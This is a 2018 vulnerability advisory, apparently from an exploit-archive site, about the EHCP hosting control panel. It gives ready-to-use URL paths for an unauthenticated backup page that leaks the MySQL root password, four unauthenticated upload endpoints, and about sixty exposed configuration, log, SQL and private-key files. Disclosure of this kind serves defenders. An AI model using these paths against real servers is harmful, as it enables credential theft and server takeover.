facebook facebook twitter rss

Easy Hosting Control Panel - Multiple Vulnerabilities

Author: Rednofozi , Published: 10-09-2018
[+] Title                 :- Easy Hosting Control Panel - Multiple Vulnerabilities
[+] Date :- 2018-09-10
[+] Exploit Author :- Rednofozi
[+] Vendor Homepage :-N/A
[+] Version :- All Versions
[+] Tested on :- Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- N/A
[+] Team name :- Anonysec.org
[+] Official Website :- nadaram :d
[+] Contact :- Rednofozi@yahoo.com



=========================================================


########################################################
EHCP Easy Hosting Control Panel
Multiple Vulnerabilities -
Clear Text MySQL Root Password
Insufficiently Protected Sensitive Data
Authentication Bypass
Unauthenticated Arbitrary File Upload

Software Links:
https://launchpad.net/ehcp
http://www.ehcp.net
https://sourceforge.net/p/ehcp/wiki/
--------------------------------------------------------------------------------------------
Description:
ehcp is a hosting control panel, for multiple domains on single
machine. easily installable,easy usage, non-complex,functional.
homepage:http://www.ehcp.net * automatically installs and works: dns,
apache, mysql, ftp, email, domains and auto updates
--------------------------------------------------------------------------------------------

CWE-256: Plaintext Storage of a Password
CWE-522: Insufficiently Protected Credentials
CWE-200: Information Exposure
CWE-592: Authentication Bypass Issues
Access : Remote (All Vulnerabilities)
Complexity : Low (All Vulnerabilities)

Currently, many resellers are using this software to manage multiple
customer domains, which in many cases also exposes ssh and mysql ports
to the outside world.

All known versions between 0.29 and 0.37.9 are affected. Earlier
versions may be impacted as well.
ver 0.37.9
ver 0.30.6
ver.0.29.15
ver 0.29.13

--------------------------------------------------------------------------------------------
#1 Plaintext Storage of a Password
By browsing directly to http://<IP>/ehcp/ehcpbackup.php sensitive
information regarding the web server, local OS and SQL DB are exposed
without authentication. This almost always includes the MySQL root
password in clear text via the exposure of a mysqldump action. These
credentials can be used to log directly into PHPMYADMIN. The
ehcpbackup.php file also exposes the dir listing of the ehcp directory
itself, local file paths, all databases and domains associated with
that EHCP build as well as domain useranmes.

As with almost every file in the EHCP software suite, the permissions
are set to -rw-r--r--

http://<IP>/ehcp/ehcpbackup.php

Access : Remote
Complexity : Low
Impact : Complete
CWE-256: Plaintext Storage of a Password
CWE-200: Information Exposure
CWE-592: Authentication Bypass Issues

--------------------------------------------------------------------------------------------
#2 Unauthenticated File upload
Unauthenticated file upload By browsing to any of the following four
URLs, a remote attacker can upload any file which then is stored in a
phptmpdir directory. It does not appear to validate either the user
uploading nor the file type.

http://<IP>/ehcp/test/up2.php
http://<IP>/ehcp/test/upload2.php
http://<IP>/ehcp/test/upload.php
http://<IP>/ehcp/test/up.php

Access : Remote
Complexity : Low
CWE-592: Authentication Bypass Issues
CWE-434: Unrestricted Upload of File

--------------------------------------------------------------------------------------------
#3 Information Disclosure
The following URL pathways can be remotely browsed to without
authentication. They all give various amounts of information
disclosure which exposes almost all of the underworking directory and
functions of the Hosting software, SQL tables and database queries.

http://<IP>/ehcp/ehcp_postfix.sh
http://<IP>/phpsysinfo
http://<IP>/ehcp/apache_default.conf
http://<IP>/ehcp/apachehcp_auth.conf
http://<IP>/ehcp/apachehcp.conf
http://<IP>/ehcp/apachehcp_passivedomains.conf
http://<IP>/ehcp/apachehcp_subdomains.conf
http://<IP>/ehcp/apache_subdomain_template
http://<IP>/ehcp/apache_subdomain_template_ipbased
http://<IP>/ehcp/apachetemplate
http://<IP>/ehcp/apachetemplate_ipbased
http://<IP>/ehcp/apachetemplate_passivedomains
http://<IP>/ehcp/ehcp-apt-get-install.log
http://<IP>/ehcp/ehcpbackup.php
http://<IP>/ehcp/ehcpdaemon2.sh
http://<IP>/ehcp/install_log.txt
http://<IP>/ehcp/install.sh
http://<IP>/ehcp/LocalServer.cnf
http://<IP>/ehcp/ehcp_daemon.py
http://<IP>/ehcp/ehcpdaemon.sh
http://<IP>/ehcp/ehcp_fix_apache.php
http://<IP>/ehcp/ehcpinfo.html
http://<IP>/ehcp/ehcp_postfix2.sh
http://<IP>/ehcp/ehcp_postfix.sh
http://<IP>/ehcp/ehcp.sql
http://<IP>/ehcp/ehcp_upgrade.sh
http://<IP>/ehcp/ehcpupgrade.sql
http://<IP>/ehcp/checkapacheconfig.sh
http://<IP>/ehcp/checkapache.sh
http://<IP>/ehcp/etc/apache2/apache_subdomain_template
http://<IP>/ehcp/etc/apache2/apache_subdomain_template_ipbased
http://<IP>/ehcp/etc/apache2/apachetemplate
http://<IP>/ehcp/etc/apache2/apachetemplate_ipbased
http://<IP>/ehcp/etc/apache2/apachetemplate_passivedomains
http://<IP>/ehcp/etc/apache2/default
http://<IP>/ehcp/etc/apache2/ports.conf
http://<IP>/ehcp/etc/apache2_ssl/apache_subdomain_template
http://<IP>/ehcp/etc/apache2_ssl/apachetemplate
http://<IP>/ehcp/etc/apache2_ssl/apachetemplate_ipbased
http://<IP>/ehcp/etc/apache2_ssl/apachetemplate_passivedomains
http://<IP>/ehcp/etc/apache2_ssl/default
http://<IP>/ehcp/etc/apache2_ssl/default-ssl
http://<IP>/ehcp/etc/apache2_ssl/ports.conf
http://<IP>/ehcp/etc/logrotate.d/ehcp
http://<IP>/ehcp/named_ehcp.conf
http://<IP>/ehcp/phpadmin.php
http://<IP>/ehcp/phpmyadmin.conf
http://<IP>/ehcp/pop-before-smtp.conf
http://<IP>/ehcp/resetmysqlrootpass.sh
http://<IP>/ehcp/scriptsupdate.sql
http://<IP>/ehcp/scriptsupdate.sql.html
http://<IP>/ehcp/setup.sh
http://<IP>/ehcp/smtpd.cert
http://<IP>/ehcp/smtpd.key
http://<IP>/ehcp/ssh2.sh
http://<IP>/ehcp/stats.php
http://<IP>/ehcp/misc/importexport.php
http://<IP>/ehcp/misc/mysqltroubleshooter.php
http://<IP>/ehcp/misc/redirect_index.html
http://<IP>/ehcp/misc/serverstatus.sh


Access : Remote
Complexity : Low
CWE-256: Plaintext Storage of a Password
CWE-200: Information Exposure
CWE-592: Authentication Bypass Issues

--------------------------------------------------------------------------------------------

#######################################################
Anonysec hacker iranin
########################################################

=======================================================
# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :